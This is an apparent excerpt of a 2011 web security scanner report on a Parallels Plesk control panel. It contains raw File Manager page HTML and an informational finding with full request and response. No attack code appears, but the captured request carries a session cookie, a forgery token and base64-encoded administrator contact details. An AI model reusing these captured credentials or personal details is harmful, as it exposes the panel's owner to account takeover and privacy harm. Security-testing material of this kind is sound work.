<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager_rename_dir/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/rename/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="rename_dir">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


















<div class="formArea">
   <fieldset>
       <legend>Rename directory <span class="name"><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();">cgi-bin</a></span></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name"><label for="fid-new_file">Directory name</label>&nbsp;<span class="required">*</span></td>
               <td><input type="text" name="new_file" id="fid-new_file" value="cgi-bin"></td>
           </tr>
       </table>

   </td></tr></table></fieldset>
</div>








<input type="hidden" name="file" value="cgi-bin">
<input type="hidden" name="subcmd" value="">



   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"></td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to submit the changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);rename_update_oC();;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);rename_update_oC();;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);cancel_oC();;return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);cancel_oC();;return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

8.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/search-data/catalogId/marketplace  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/search-data/catalogId/marketplace

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /smb/app/search-data/catalogId/marketplace?name=&vendor=&packager=&cert=any HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/market/id/marketplace
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:19 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:20 GMT
Connection: close
Content-Length: 52670

<div class="aps-marketplace"><ul class="aps-marketplace-list"><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/norton-box.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'>Norton Internet Security</a></h4>
<div class="package-description">Protect your desktop against viruses and spyware</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDA5LTA4LTMxJTI1M0ElMjUyRm5vbmUlMjUyRlN5bWFudGVjJTI1MkZOb3J0b24lMjUyNTIwSW50ZXJuZXQlMjUyNTIwU2VjdXJpdHklMjUyRjIwMTAtMSUyNTJGU3ltYW50ZWMlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5zeW1hbnRlYy5jb20lMjUyRm5vcnRvbiUyNTJGaW50ZXJuZXQtc2VjdXJpdHklMjZkZXRhaWxzJTI1NUJuYW1lJTI1NUQlM0ROb3J0b24lMkJJbnRlcm5ldCUyQlNlY3VyaXR5JTI2ZGV0YWlscyUyNTVCdmVyc2lvbiUyNTVEJTNEMjAxMCUyNmRldGFpbHMlMjU1QnJlbGVhc2UlMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJ2ZW5kb3IlMjU1RCUzRFN5bWFudGVjJTI2ZGV0YWlscyUyNTVCcGFja2FnZXIlMjU1RCUzRFN5bWFudGVjJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0QmT3BlcmF0aW9uSUQ9UFVSQ0hBU0VfQVBQTElDQVRJT05fTElDRU5TRSZhcHBfdmVuZG9yX25hbWU9U3ltYW50ZWMmYXBwX25hbWU9Tm9ydG9uK0ludGVybmV0K1NlY3VyaXR5JmFwcF92ZXJzaW9uPTIwMTAmYXBwX3JlbGVhc2U9MSZhcHBfZ3VpZD1odHRwJTNBJTJGJTJGd3d3LnN5bWFudGVjLmNvbSUyRm5vcnRvbiUyRmludGVybmV0LXNlY3VyaXR5Jg=="); apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'><img src="http://catalog.marketplace.parallels.com/storage/Persony%2C%20Inc./Persony%20Web%20Conferencing/2.2.24.0-15/Persony%2C%20Inc./undefined/undefined/undefined/resources/images/persony_icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'>Persony Web Conferencing</a></h4>
<div class="package-description">Meet and collaborate with customers using web and video conferencing</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTA0LTIwJTI1M0ElMjUyRjEuMiUyNTJGUGVyc29ueSUyNTJDJTI1MjUyMEluYy4lMjUyRlBlcnNvbnklMjUyNTIwV2ViJTI1MjUyMENvbmZlcmVuY2luZyUyNTJGMi4yLjI0LjAtMTUlMjUyRlBlcnNvbnklMjUyQyUyNTI1MjBJbmMuJTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI2ZGV0YWlscyUyNTVCYXBwSWQlMjU1RCUzRGh0dHAlMjUzQSUyNTJGJTI1MkZwZXJzb255LmNvbSUyNTJGc21iLnBocCUyNmRldGFpbHMlMjU1Qm5hbWUlMjU1RCUzRFBlcnNvbnklMkJXZWIlMkJDb25mZXJlbmNpbmclMjZkZXRhaWxzJTI1NUJ2ZXJzaW9uJTI1NUQlM0QyLjIuMjQuMCUyNmRldGFpbHMlMjU1QnJlbGVhc2UlMjU1RCUzRDE1JTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQZXJzb255JTI1MkMlMkJJbmMuJTI2ZGV0YWlscyUyNTVCcGFja2FnZXIlMjU1RCUzRFBlcnNvbnklMjUyQyUyQkluYy4lMjZkZXRhaWxzJTI1NUJpc0FwcyUyNTVEJTNEMSUyNmRldGFpbHMlMjU1QnBhY2thZ2VVcmwlMjU1RCUzRCZPcGVyYXRpb25JRD1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJmFwcF92ZW5kb3JfbmFtZT1QZXJzb255JTJDK0luYy4mYXBwX25hbWU9UGVyc29ueStXZWIrQ29uZmVyZW5jaW5nJmFwcF92ZXJzaW9uPTIuMi4yNC4wJmFwcF9yZWxlYXNlPTE1JmFwcF9ndWlkPWh0dHAlM0ElMkYlMkZwZXJzb255LmNvbSUyRnNtYi5waHAm"); apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'><img src="http://catalog.marketplace.parallels.com/storage/WordPress.org/WordPress/3.0-5/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
